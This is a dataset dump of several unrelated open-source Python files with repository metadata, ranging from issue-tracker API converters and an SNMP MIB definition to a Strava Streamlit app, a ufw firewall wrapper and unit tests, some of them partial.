attachments=[convert_attachment(a) for a in comment.attachments],
author=convert_person(comment.user_id, mar.cnxn, services,
trap_exception=True),
canDelete=can_delete,
content=comment.content,
deletedBy=convert_person(comment.deleted_by, mar.cnxn, services,
trap_exception=True),
id=comment.sequence,
published=datetime.datetime.fromtimestamp(comment.timestamp),
updates=convert_amendments(issue, comment.amendments, mar, services),
kind='monorail#issueComment')
def convert_attachment(attachment):
"""Convert Monorail Attachment PB to API Attachment."""
return api_pb2_v1.Attachment(
attachmentId=attachment.attachment_id,
fileName=attachment.filename,
fileSize=attachment.filesize,
mimetype=attachment.mimetype,
isDeleted=attachment.deleted)
def convert_amendments(issue, amendments, mar, services):
"""Convert a list of Monorail Amendment PBs to API Update."""
result = api_pb2_v1.Update(kind='monorail#issueCommentUpdate')
for amendment in amendments:
if amendment.field == tracker_pb2.FieldID.SUMMARY:
result.summary = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.STATUS:
result.status = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.OWNER:
if len(amendment.added_user_ids) == 0:
result.owner = framework_constants.NO_USER_NAME
else:
result.owner = _get_user_email(
services.user, mar.cnxn, amendment.added_user_ids[0])
elif amendment.field == tracker_pb2.FieldID.LABELS:
result.labels = amendment.newvalue.split()
elif amendment.field == tracker_pb2.FieldID.CC:
for user_id in amendment.added_user_ids:
user_email = _get_user_email(
services.user, mar.cnxn, user_id)
result.cc.append(user_email)
for user_id in amendment.removed_user_ids:
user_email = _get_user_email(
services.user, mar.cnxn, user_id)
result.cc.append('-%s' % user_email)
elif amendment.field == tracker_pb2.FieldID.BLOCKEDON:
result.blockedOn = _append_project(
amendment.newvalue, issue.project_name)
elif amendment.field == tracker_pb2.FieldID.BLOCKING:
result.blocking = _append_project(
amendment.newvalue, issue.project_name)
elif amendment.field == tracker_pb2.FieldID.MERGEDINTO:
result.mergedInto = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.COMPONENTS:
result.components = amendment.newvalue.split()
elif amendment.field == tracker_pb2.FieldID.CUSTOM:
fv = api_pb2_v1.FieldValue()
fv.fieldName = amendment.custom_field_name
fv.fieldValue = amendment.newvalue
result.fieldValues.append(fv)
return result
def _get_user_email(user_service, cnxn, user_id):
"""Get user email."""
try:
user_email = user_service.LookupUserEmail(
cnxn, user_id)
if not user_email:
user_email = framework_constants.DELETED_USER_NAME
except user_svc.NoSuchUserException:
user_email = framework_constants.DELETED_USER_NAME
return user_email
def _append_project(issue_ids, project_name):
"""Append project name to convert <id> to <project>:<id> format."""
result = []
id_list = issue_ids.split()
for id_str in id_list:
if ':' in id_str:
result.append(id_str)
# '-' means this issue is being removed
elif id_str.startswith('-'):
result.append('-%s:%s' % (project_name, id_str[1:]))
else:
result.append('%s:%s' % (project_name, id_str))
return result
def split_remove_add(item_list):
"""Split one list of items into two: items to add and items to remove."""
list_to_add = []
list_to_remove = []
for item in item_list:
if item.startswith('-'):
list_to_remove.append(item[1:])
else:
list_to_add.append(item)
return list_to_add, list_to_remove
# TODO(sheyang): batch the SQL queries to fetch projects/issues.
def issue_global_ids(project_local_id_pairs, project_id, mar, services):
"""Find global issues ids given <project_name>:<issue_local_id> pairs."""
result = []
for pair in project_local_id_pairs:
issue_project_id = None
local_id = None
if ':' in pair:
pair_ary = pair.split(':')
project_name = pair_ary[0]
local_id = int(pair_ary[1])
project = services.project.GetProjectByName(mar.cnxn, project_name)
if not project:
raise project_svc.NoSuchProjectException(
'Project %s does not exist' % project_name)
issue_project_id = project.project_id
else:
issue_project_id = project_id
local_id = int(pair)
result.append(
services.issue.LookupIssueID(mar.cnxn, issue_project_id, local_id))
return result
def convert_group_settings(group_name, setting):
"""Convert UserGroupSettings to UserGroupSettingsWrapper."""
return api_pb2_v1.UserGroupSettingsWrapper(
groupName=group_name,
who_can_view_members=setting.who_can_view_members,
ext_group_type=setting.ext_group_type,
last_sync_time=setting.last_sync_time)
def convert_component_def(cd, mar, services):
"""Convert ComponentDef PB to Component PB."""
project_name = services.project.LookupProjectNames(
mar.cnxn, [cd.project_id])[cd.project_id]
user_ids = set()
user_ids.update(
cd.admin_ids + cd.cc_ids + [cd.creator_id] + [cd.modifier_id])
user_names_dict = services.user.LookupUserEmails(mar.cnxn, list(user_ids))
component = api_pb2_v1.Component(
componentId=cd.component_id,
projectName=project_name,
componentPath=cd.path,
description=cd.docstring,
admin=sorted([user_names_dict[uid] for uid in cd.admin_ids]),
cc=sorted([user_names_dict[uid] for uid in cd.cc_ids]),
deprecated=cd.deprecated)
if cd.created:
component.created = datetime.datetime.fromtimestamp(cd.created)
component.creator = user_names_dict[cd.creator_id]
if cd.modified:
component.modified = datetime.datetime.fromtimestamp(cd.modified)
component.modifier = user_names_dict[cd.modifier_id]
return component
def convert_component_ids(config, component_names):
"""Convert a list of component names to ids."""
component_names_lower = [name.lower() for name in component_names]
result = []
for cd in config.component_defs:
cpath = cd.path
if cpath.lower() in component_names_lower:
result.append(cd.component_id)
return result
def convert_field_values(field_values, mar, services):
"""Convert user passed in field value list to FieldValue PB, or labels."""
fv_list_add = []
fv_list_remove = []
fv_list_clear = []
label_list_add = []
label_list_remove = []
field_name_dict = {
fd.field_name: fd for fd in mar.config.field_defs}
for fv in field_values:
field_def = field_name_dict.get(fv.fieldName)
if not field_def:
logging.warning('Custom field %s of does not exist', fv.fieldName)
continue
if fv.operator == api_pb2_v1.FieldValueOperator.clear:
fv_list_clear.append(field_def.field_id)
continue
# Enum fields are stored as labels
if field_def.field_type == tracker_pb2.FieldTypes.ENUM_TYPE:
raw_val = '%s-%s' % (fv.fieldName, fv.fieldValue)
if fv.operator == api_pb2_v1.FieldValueOperator.remove:
label_list_remove.append(raw_val)
elif fv.operator == api_pb2_v1.FieldValueOperator.add:
label_list_add.append(raw_val)
else:
logging.warning('Unsupported field value operater %s', fv.operator)
else:
new_fv = tracker_pb2.FieldValue(
field_id=field_def.field_id)
if field_def.field_type == tracker_pb2.FieldTypes.USER_TYPE:
try:
new_fv.user_id = services.user.LookupUserID(mar.cnxn, fv.fieldValue)
except user_svc.NoSuchUserException:
new_fv.user_id = 0
elif field_def.field_type == tracker_pb2.FieldTypes.STR_TYPE:
new_fv.str_value = fv.fieldValue
elif field_def.field_type == tracker_pb2.FieldTypes.INT_TYPE:
new_fv.int_value = int(fv.fieldValue)
else:
logging.warning(
'Unsupported field value type %s', field_def.field_type)
if fv.operator == api_pb2_v1.FieldValueOperator.remove:
fv_list_remove.append(new_fv)
elif fv.operator == api_pb2_v1.FieldValueOperator.add:
fv_list_add.append(new_fv)
else:
logging.warning('Unsupported field value operater %s', fv.operator)
return (fv_list_add, fv_list_remove, fv_list_clear,
label_list_add, label_list_remove)
| 35.485477 | 78 | 0.716265 |
6a2fe9fc55d86e49bc69dd057bc5f300e14dbe22
| 10,782 |
py
|
Python
|
excut/feedback/rulebased_deduction/deduction_engine_extended.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | 5 |
2020-11-17T19:59:49.000Z
|
2021-09-23T23:10:39.000Z
|
excut/feedback/rulebased_deduction/deduction_engine_extended.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
excut/feedback/rulebased_deduction/deduction_engine_extended.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains the rule-based inference (rulebased_deduction engine)
"""
import itertools
from collections import defaultdict
from itertools import chain
from excut.explanations_mining.descriptions import dump_explanations_to_file
from excut.explanations_mining.descriptions_new import Description2, Atom, load_from_file
from excut.explanations_mining.explaining_engines_extended import PathBasedClustersExplainerExtended
from excut.explanations_mining.simple_miner.description_miner_extended import DescriptionMinerExtended, ExplanationStructure
from excut.kg.kg_query_interface_extended import EndPointKGQueryInterfaceExtended, KGQueryInterfaceExtended
from excut.kg.kg_indexing import Indexer
from excut.kg.utils.data_formating import n3_repr
from excut.utils.logging import logger
from excut.kg.utils.Constants import DEFUALT_AUX_RELATION
from excut.clustering import target_entities as tes
def dump_predictions_map(per_var_predictions, out_filepath, triple_format=True, topk=-1, with_weight=True,
with_description=False, quality='x_coverage'):
"""
Writes the predictions to two files, the first is human readable and the other with .parsable extension that can be
parsed in python.
:param per_var_predictions:
:param out_filepath:
:param triple_format:
:param topk:
:param with_weight:
:param with_description:
:return:
"""
out_file_parsable = out_filepath + '.parsable'
out_filepath_with_type = out_filepath + ('.%s' % quality if len(quality) > 0 else '')
with open(out_filepath_with_type, 'w') as out_file:
for var, predictions in per_var_predictions.items():
if topk > 0:
predictions = predictions[:topk]
for p in predictions:
if triple_format:
# I only output normalized_coverage
out_str = n3_repr(p.triple) + ('\t%f' % p.get_quality(quality) if with_weight else '') + (
'\t%s' % p.source_description if with_description else '')
else:
out_str = str(p)
out_file.write(out_str)
out_file.write('\n')
with open(out_file_parsable + ('.%s' % quality if len(quality) > 0 else ''), 'w') as out_file:
out_file.write('\n'.join(
map(str, chain.from_iterable(map(lambda l: l[:topk] if topk > 0 else l, per_var_predictions.values())))))
return out_filepath_with_type
if __name__ == '__main__':
target_entities=tes.load_from_file('/scratch/GW/pool0/gadelrab/ExDEC/data/yago/yago_art_3_4k.tsv')
vos_executer = EndPointKGQueryInterfaceExtended('http://halimede:8890/sparql',
['http://yago-expr.org', 'http://yago-expr.org.types'],
labels_identifier='http://yago-expr.org.labels')
explainer=PathBasedClustersExplainerExtended(vos_executer, language_bias={'max_length': 4, 'structure': ExplanationStructure.TREE})
explans=explainer.explain(target_entities,
output_file='/scratch/GW/pool0/gadelrab/ExDEC/tmp/explanations_tree.txt')
ded = SparqlBasedDeductionEngineExtended(vos_executer)
per_var_predictions = ded.infer(explans, target_entities,
output_filepath='/scratch/GW/pool0/gadelrab/ExDEC/tmp/predictions_tree.tsv')
logger.info("Total variables with predictions subjects: %i", len(per_var_predictions))
| 42.785714 | 147 | 0.667501 |
6a3060eba97a54372d78e04129b03dceb1e1d40e
| 916 |
py
|
Python
|
dataloader/viperlist_train.py
|
urasakikeisuke/rigidmask
|
4bb781102218dfd11efa767e2d0ba987d9949fd1
|
[
"MIT"
] | 138 |
2021-01-12T03:02:04.000Z
|
2022-03-30T07:14:15.000Z
|
dataloader/viperlist_train.py
|
urasakikeisuke/rigidmask
|
4bb781102218dfd11efa767e2d0ba987d9949fd1
|
[
"MIT"
] | 12 |
2021-02-02T14:19:30.000Z
|
2022-03-28T01:23:44.000Z
|
dataloader/viperlist_train.py
|
urasakikeisuke/rigidmask
|
4bb781102218dfd11efa767e2d0ba987d9949fd1
|
[
"MIT"
] | 14 |
2021-01-13T01:31:34.000Z
|
2022-01-30T14:48:06.000Z
|
import torch.utils.data as data
from PIL import Image
import os
import os.path
import numpy as np
import pdb
import glob
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
| 24.756757 | 97 | 0.634279 |
6a30d65ddcf953ceadcc9809b51e37283b427dac
| 49 |
py
|
Python
|
floodcomparison/__init__.py
|
jsosa/floodcomparison
|
c6662ae9142b4e89c6c05f93adaba49c5d8e4314
|
[
"Apache-2.0"
] | null | null | null |
floodcomparison/__init__.py
|
jsosa/floodcomparison
|
c6662ae9142b4e89c6c05f93adaba49c5d8e4314
|
[
"Apache-2.0"
] | null | null | null |
floodcomparison/__init__.py
|
jsosa/floodcomparison
|
c6662ae9142b4e89c6c05f93adaba49c5d8e4314
|
[
"Apache-2.0"
] | null | null | null |
from floodcomparison.core import floodcomparison
| 24.5 | 48 | 0.897959 |
6a315f9411feef2bef3f2cfb2fab79f19fe80e02
| 7,842 |
py
|
Python
|
weaver/wps_restapi/quotation/quotes.py
|
crim-ca/weaver
|
107fec5e19f20b77061b9405a764da911d2db8a2
|
[
"Apache-2.0"
] | 16 |
2019-03-18T12:23:05.000Z
|
2022-02-25T00:39:11.000Z
|
weaver/wps_restapi/quotation/quotes.py
|
crim-ca/weaver
|
107fec5e19f20b77061b9405a764da911d2db8a2
|
[
"Apache-2.0"
] | 346 |
2019-03-06T21:05:04.000Z
|
2022-03-31T13:38:37.000Z
|
weaver/wps_restapi/quotation/quotes.py
|
crim-ca/weaver
|
107fec5e19f20b77061b9405a764da911d2db8a2
|
[
"Apache-2.0"
] | 5 |
2019-03-15T01:38:28.000Z
|
2021-11-11T15:38:43.000Z
|
import logging
import random
from datetime import timedelta
from typing import TYPE_CHECKING
from duration import to_iso8601
from pyramid.httpexceptions import HTTPBadRequest, HTTPCreated, HTTPNotFound, HTTPOk
from weaver import sort
from weaver.config import WEAVER_CONFIGURATION_ADES, WEAVER_CONFIGURATION_EMS, get_weaver_configuration
from weaver.database import get_db
from weaver.datatype import Bill, Quote
from weaver.exceptions import ProcessNotFound, QuoteNotFound, log_unhandled_exceptions
from weaver.formats import OUTPUT_FORMAT_JSON
from weaver.processes.types import PROCESS_APPLICATION, PROCESS_WORKFLOW
from weaver.processes.wps_package import get_package_workflow_steps, get_process_location
from weaver.store.base import StoreBills, StoreQuotes
from weaver.utils import get_settings, get_weaver_url
from weaver.wps_restapi import swagger_definitions as sd
from weaver.wps_restapi.processes.processes import submit_local_job
if TYPE_CHECKING:
from weaver.datatype import Process
from weaver.typedefs import JSON
LOGGER = logging.getLogger(__name__)
def process_quote_estimator(process): # noqa: E811
# type: (Process) -> JSON
"""
Simulate quote parameters for the process execution.
:param process: instance of :class:`weaver.datatype.Process` for which to evaluate the quote.
:return: dict of {price, currency, estimatedTime} values for the process quote.
"""
# TODO: replace by some fancy ml technique or something?
price = random.uniform(0, 10) # nosec
currency = "CAD"
estimated_time = to_iso8601(timedelta(minutes=random.uniform(5, 60))) # nosec
return {"price": price, "currency": currency, "estimatedTime": estimated_time}
| 43.810056 | 119 | 0.718822 |
6a31701fc7c063904134f212988d1c0c79559f82
| 6,722 |
py
|
Python
|
pysnmp/CISCO-VSI-CONTROLLER-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11 |
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/CISCO-VSI-CONTROLLER-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75 |
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/CISCO-VSI-CONTROLLER-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10 |
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module CISCO-VSI-CONTROLLER-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-VSI-CONTROLLER-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:03:33 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
ObjectIdentity, NotificationType, Gauge32, Bits, Unsigned32, IpAddress, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Counter32, Counter64, iso, Integer32, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "NotificationType", "Gauge32", "Bits", "Unsigned32", "IpAddress", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Counter32", "Counter64", "iso", "Integer32", "TimeTicks")
TextualConvention, RowStatus, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "RowStatus", "DisplayString")
ciscoVSIControllerMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 141))
if mibBuilder.loadTexts: ciscoVSIControllerMIB.setLastUpdated('9906080000Z')
if mibBuilder.loadTexts: ciscoVSIControllerMIB.setOrganization('Cisco Systems, Inc.')
cvcMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 1))
cvcConfController = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1))
cvcConfTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1), )
if mibBuilder.loadTexts: cvcConfTable.setStatus('current')
cvcConfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1), ).setIndexNames((0, "CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerID"))
if mibBuilder.loadTexts: cvcConfEntry.setStatus('current')
cvcConfControllerID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647)))
if mibBuilder.loadTexts: cvcConfControllerID.setStatus('current')
cvcConfControllerType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 2), CvcControllerType()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfControllerType.setStatus('current')
cvcConfControllerShelfLocation = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 3), CvcControllerShelfLocation()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfControllerShelfLocation.setStatus('current')
cvcConfControllerLocation = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfControllerLocation.setStatus('current')
cvcConfControllerName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 5), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfControllerName.setStatus('current')
cvcConfVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 4095))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfVpi.setStatus('current')
cvcConfVci = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(32, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfVci.setStatus('current')
cvcConfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 8), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfRowStatus.setStatus('current')
cvcMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 3))
cvcMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 1))
cvcMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 2))
cvcMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 1, 1)).setObjects(("CISCO-VSI-CONTROLLER-MIB", "cvcConfGroup"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfGroupExternal"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvcMIBCompliance = cvcMIBCompliance.setStatus('current')
cvcConfGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 2, 1)).setObjects(("CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerType"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerShelfLocation"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerLocation"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerName"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfRowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvcConfGroup = cvcConfGroup.setStatus('current')
cvcConfGroupExternal = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 2, 2)).setObjects(("CISCO-VSI-CONTROLLER-MIB", "cvcConfVpi"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfVci"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvcConfGroupExternal = cvcConfGroupExternal.setStatus('current')
mibBuilder.exportSymbols("CISCO-VSI-CONTROLLER-MIB", cvcConfTable=cvcConfTable, cvcMIBGroups=cvcMIBGroups, cvcConfControllerType=cvcConfControllerType, cvcConfVpi=cvcConfVpi, CvcControllerShelfLocation=CvcControllerShelfLocation, cvcConfControllerLocation=cvcConfControllerLocation, cvcConfController=cvcConfController, cvcConfControllerName=cvcConfControllerName, PYSNMP_MODULE_ID=ciscoVSIControllerMIB, cvcConfControllerID=cvcConfControllerID, cvcConfGroupExternal=cvcConfGroupExternal, cvcMIBCompliance=cvcMIBCompliance, cvcConfEntry=cvcConfEntry, ciscoVSIControllerMIB=ciscoVSIControllerMIB, cvcConfControllerShelfLocation=cvcConfControllerShelfLocation, cvcConfRowStatus=cvcConfRowStatus, cvcConfGroup=cvcConfGroup, CvcControllerType=CvcControllerType, cvcConfVci=cvcConfVci, cvcMIBObjects=cvcMIBObjects, cvcMIBCompliances=cvcMIBCompliances, cvcMIBConformance=cvcMIBConformance)
| 105.03125 | 883 | 0.759298 |
6a328e84b47f7a5de237d63ba7bea1c7be663611
| 6,282 |
py
|
Python
|
strava.py
|
AartGoossens/streamlit-activity-viewer
|
b43f157d8bee596908c4f2222be9bb0d8bd9b9e8
|
[
"MIT"
] | 4 |
2021-05-21T11:34:00.000Z
|
2022-02-17T18:22:06.000Z
|
strava.py
|
AartGoossens/streamlit-activity-viewer
|
b43f157d8bee596908c4f2222be9bb0d8bd9b9e8
|
[
"MIT"
] | null | null | null |
strava.py
|
AartGoossens/streamlit-activity-viewer
|
b43f157d8bee596908c4f2222be9bb0d8bd9b9e8
|
[
"MIT"
] | null | null | null |
import base64
import os
import arrow
import httpx
import streamlit as st
import sweat
from bokeh.models.widgets import Div
APP_URL = os.environ["APP_URL"]
STRAVA_CLIENT_ID = os.environ["STRAVA_CLIENT_ID"]
STRAVA_CLIENT_SECRET = os.environ["STRAVA_CLIENT_SECRET"]
STRAVA_AUTHORIZATION_URL = "https://www.strava.com/oauth/authorize"
STRAVA_API_BASE_URL = "https://www.strava.com/api/v3"
DEFAULT_ACTIVITY_LABEL = "NO_ACTIVITY_SELECTED"
STRAVA_ORANGE = "#fc4c02"
| 27.552632 | 120 | 0.641356 |
6a3376e3801e88076e88946747dfd57658118979
| 3,395 |
py
|
Python
|
appliance/src/ufw_interface.py
|
reap3r/nmfta-bouncer
|
a178244dbf0b8a165aabc02a5d1ba05006f9ec22
|
[
"Apache-2.0"
] | 1 |
2019-01-10T00:31:09.000Z
|
2019-01-10T00:31:09.000Z
|
appliance/src/ufw_interface.py
|
nmfta-repo/nmfta-bouncer
|
a178244dbf0b8a165aabc02a5d1ba05006f9ec22
|
[
"Apache-2.0"
] | 21 |
2019-02-28T14:23:11.000Z
|
2020-07-07T20:46:37.000Z
|
appliance/src/ufw_interface.py
|
nmfta-repo/nmfta-bouncer
|
a178244dbf0b8a165aabc02a5d1ba05006f9ec22
|
[
"Apache-2.0"
] | 2 |
2019-05-07T13:16:49.000Z
|
2020-06-23T13:49:01.000Z
|
#!/usr/bin/env python
#shamelessy stolen from: https://gitlab.com/dhj/easyufw
# A thin wrapper over the thin wrapper that is ufw
# Usage:
# import easyufw as ufw
# ufw.disable() # disable firewall
# ufw.enable() # enable firewall
# ufw.allow() # default allow -- allow all
# ufw.allow(22) # allow port 22, any protocol
# ufw.allow(22,'tcp') # allow port 22, tcp protocol
# ufw.allow('22/tcp') # allow port 22, tcp protocol
# ufw.allow(53,'udp') # allow port 53, udp protocol
# ufw.allow(53,'udp') # allow port 53, udp protocol
# ufw.deny() # default deny -- deny all
# ufw.deny(22,'tcp') # deny port 22, tcp protocol
# ufw.delete(22) # delete rules referencing port 22
# ufw.reset() # restore defaults
# ufw.status() # return status string (default verbose=True)
# ufw.run("allow 22") # directly run command as if from command line
import ufw.frontend
import ufw.common
import gettext
progName = ufw.common.programName
gettext.install(progName)#, unicode=True) # for i18n; fixes '_' not defined
ui = ufw.frontend.UFWFrontend(False) # no dryrun -- do it live
backend = ui.backend
parse_command = ufw.frontend.parse_command
| 29.267241 | 77 | 0.620619 |
6a33b81f30e4d4f06b72174eedd941785bd5b519
| 1,325 |
py
|
Python
|
test/libsalt/test_vehicle.py
|
etri-city-traffic-brain/traffic-simulator
|
6d5061febeaef484388b2b5aee14d9894099d98a
|
[
"Apache-2.0"
] | 8 |
2020-08-27T05:44:05.000Z
|
2021-12-27T05:11:17.000Z
|
test/libsalt/test_vehicle.py
|
etri-city-traffic-brain/traffic-simulator
|
6d5061febeaef484388b2b5aee14d9894099d98a
|
[
"Apache-2.0"
] | null | null | null |
test/libsalt/test_vehicle.py
|
etri-city-traffic-brain/traffic-simulator
|
6d5061febeaef484388b2b5aee14d9894099d98a
|
[
"Apache-2.0"
] | 1 |
2020-11-27T05:17:29.000Z
|
2020-11-27T05:17:29.000Z
|
import libsalt
# for vehicle in runnings:
# print("Running Vehicle)", vehicle.id, ":", libsalt.vehicle.getRoute(vehicle.id).toString())
# print("Running Vehicle)", vehicle.id, ":", vehicle.toString())
#print("#Standby Vehicles: ", len(standbys))
#for vehicle in standbys:
# print("Standby Vehicle)", vehicle.id, ":", libsalt.vehicle.getRouteString(vehicle.id))
#print("Standby Vehicle)", vehicle.id, ":", vehicle.toString())
if __name__ == "__main__":
salt_scenario = r"/home/mclee/project/traffic-simulator/data/dj_sample_data/2020-dj_sample.json"
test(salt_scenario)
| 33.125 | 101 | 0.648302 |
6a35d2e3dec4c05f542fce0db1d5d23465661584
| 8,348 |
py
|
Python
|
Masters/Copy Layer to Layer.py
|
davidtahim/Glyphs-Scripts
|
5ed28805b5fe03c63d904ad2f79117844c22aa44
|
[
"Apache-2.0"
] | 1 |
2021-09-04T18:41:30.000Z
|
2021-09-04T18:41:30.000Z
|
Masters/Copy Layer to Layer.py
|
davidtahim/Glyphs-Scripts
|
5ed28805b5fe03c63d904ad2f79117844c22aa44
|
[
"Apache-2.0"
] | null | null | null |
Masters/Copy Layer to Layer.py
|
davidtahim/Glyphs-Scripts
|
5ed28805b5fe03c63d904ad2f79117844c22aa44
|
[
"Apache-2.0"
] | null | null | null |
#MenuTitle: Copy Layer to Layer
# -*- coding: utf-8 -*-
__doc__="""
Copies one master to another master in selected glyphs.
"""
import GlyphsApp
import vanilla
import math
MasterFiller()
| 36.295652 | 152 | 0.713464 |
6a362d5ac32fdf3188152eb3fc2c0b00c7db0458
| 3,080 |
py
|
Python
|
vunit/test/unit/test_tokenizer.py
|
bjacobs1/vunit
|
a7f7717a172855ea7852296bb768370d50cfc992
|
[
"Artistic-2.0"
] | 1 |
2020-08-30T08:30:02.000Z
|
2020-08-30T08:30:02.000Z
|
vunit/test/unit/test_tokenizer.py
|
smgl9/vunit
|
9933d9a1ae600cc241894244361282dd7f7227d7
|
[
"Artistic-2.0"
] | null | null | null |
vunit/test/unit/test_tokenizer.py
|
smgl9/vunit
|
9933d9a1ae600cc241894244361282dd7f7227d7
|
[
"Artistic-2.0"
] | null | null | null |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (c) 2014-2018, Lars Asplund [email protected]
"""
Test of the general tokenizer
"""
from unittest import TestCase
from vunit.parsing.tokenizer import describe_location
from vunit.test.mock_2or3 import mock
def _describe_location(*codes):
"""
Helper to test describe_location
"""
contents = {}
location = None
for idx, code in enumerate(codes):
filename = "filename%i" % idx
contents[filename] = code
start = code.index("S")
if "E" in code:
end = code.index("E")
else:
end = start
location = ((filename, (start, end)), location)
with mock.patch("vunit.parsing.tokenizer.read_file", autospec=True) as mock_read_file:
with mock.patch("vunit.parsing.tokenizer.file_exists", autospec=True) as mock_file_exists:
mock_file_exists.side_effect = file_exists_side_effect
mock_read_file.side_effect = read_file_side_effect
retval = describe_location(location=location)
return retval
| 24.64 | 98 | 0.622727 |
6a3682a6dc34888138320be2d7fc9fac096c4fc7
| 1,962 |
py
|
Python
|
modules/star_se_SP.py
|
tbersez/Allmine
|
092fb1f5abcb4fd4e40b4a25386f05ecb2dea55b
|
[
"MIT"
] | 5 |
2019-02-13T13:47:24.000Z
|
2019-04-27T18:27:03.000Z
|
modules/star_se_SP.py
|
tbersez/Allmine
|
092fb1f5abcb4fd4e40b4a25386f05ecb2dea55b
|
[
"MIT"
] | null | null | null |
modules/star_se_SP.py
|
tbersez/Allmine
|
092fb1f5abcb4fd4e40b4a25386f05ecb2dea55b
|
[
"MIT"
] | null | null | null |
# STAR aligner single end mode, second pass
#
